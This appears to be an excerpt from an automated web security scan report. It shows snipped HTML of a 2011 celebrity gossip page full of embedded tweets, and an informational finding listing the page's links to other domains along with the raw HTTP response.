<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.365. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://cdn.usmagazine.com/moviestvmusic/photos/mugshots-of-the-year-20102212
http://del.icio.us/post?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://digg.com/submit?phase=2title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://sch.mp/0jHde
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg
http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Original/43716_Original.jpg
http://tl.gd/8g30qb
http://twitpic.com/3uqhh4
http://twitter.com/Akeel93
http://twitter.com/AshNHartz
http://twitter.com/AtlantaPlaces
http://twitter.com/Banshee_Song
http://twitter.com/Bethenny
http://twitter.com/Bethenny/statuses/31719343947522049
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31716032452231168
http://twitter.com/BrandonnStRegis
http://twitter.com/BravoAndy
http://twitter.com/BrielleZolciak
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31727445837090816
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/31705092302315520
http://twitter.com/Jillzarin/statuses/31705598416392194
http://twitter.com/JoshGottlieb
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/31711564050472961
http://twitter.com/Kimzolciak/statuses/31712300427644928
http://twitter.com/Kimzolciak/statuses/31712647732797440
http://twitter.com/Kimzolciak/statuses/31712954776821760
http://twitter.com/Kimzolciak/statuses/31716118221561856
http://twitter.com/Kimzolciak/statuses/31716672863731714
http://twitter.com/Kimzolciak/statuses/31726145497989121
http://twitter.com/Kimzolciak/statuses/31729214356979713
http://twitter.com/Kimzolciak/statuses/31729553827172352
http://twitter.com/Kimzolciak/statuses/31734736913170432
http://twitter.com/KingLj11
http://twitter.com/MsBrandi17
http://twitter.com/NickCannon
http://twitter.com/NickCannon/statuses/31746607615574016
http://twitter.com/OMGitsjessielee
http://twitter.com/Please_Stand_By
http://twitter.com/Sn00ki
http://twitter.com/Sn00ki/statuses/31737381589614592
http://twitter.com/TheBatkave
http://twitter.com/alydenisof
http://twitter.com/alydenisof/statuses/31744920150614016
http://twitter.com/arianazolciak
http://twitter.com/biermann71
http://twitter.com/buddyhead
http://twitter.com/continental
http://twitter.com/davenavarro6767
http://twitter.com/davenavarro6767/statuses/31674584327528449
http://twitter.com/davenavarro6767/statuses/31688081048342528
http://twitter.com/davenavarro6767/statuses/31690324585742336
http://twitter.com/ipierce89
http://twitter.com/iutrav
http://twitter.com/joshgroban
http://twitter.com/joshgroban/statuses/31671556916645888
http://twitter.com/joshgroban/statuses/31672009905672192
http://twitter.com/kimzolciak
http://twitter.com/lxnewyork
http://twitter.com/lxtvopenho
http://twitter.com/mikelizonn
http://twitter.com/prabalgurung
http://twitter.com/rzrachelzoe
http://twitter.com/rzrachelzoe/statuses/31667825831579649
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story%3Focid%3Dtwtr-utweet
http://twitter.com/wendyhagen
http://twitter.com/yokoono
http://twitter.com/yokoono/statuses/31743517785071616
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Jaime+Pressly+Files+For+Divorce&u=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
http://www.usmagazine.com/healthylifestyle/photos/2010s-biggest-splits-2010112
http://www.usmagazine.com/stylebeauty/photos/weddings-of-the-year-2009-20091012/5623
http://youtu.be/fX_120DMFDQ
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:59:17 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 1
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/43716_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/43716_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/43716_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43714_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/11742_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/44867_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/31223_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43557_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Jaime+Pressly+Files+For+Divorce&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Jaime+Pressly+Files+For+Divorce&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fjaime-pressly-files-for-divorce-1594033.story" target="_blank">Reddit</a>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/healthylifestyle/photos/2010s-biggest-splits-2010112" TARGET="_blank">PHOTOS: See what other stars have called it quits</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://cdn.usmagazine.com/moviestvmusic/photos/mugshots-of-the-year-20102212" TARGET="_blank">PHOTOS: Check out these celebrity mugshots</A>
...[SNIP]...
<P ALIGN="LEFT"><A HREF="http://www.usmagazine.com/stylebeauty/photos/weddings-of-the-year-2009-20091012/5623" TARGET="_blank">PHOTOS: Jaime and Simran's personal wedding pic</A>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
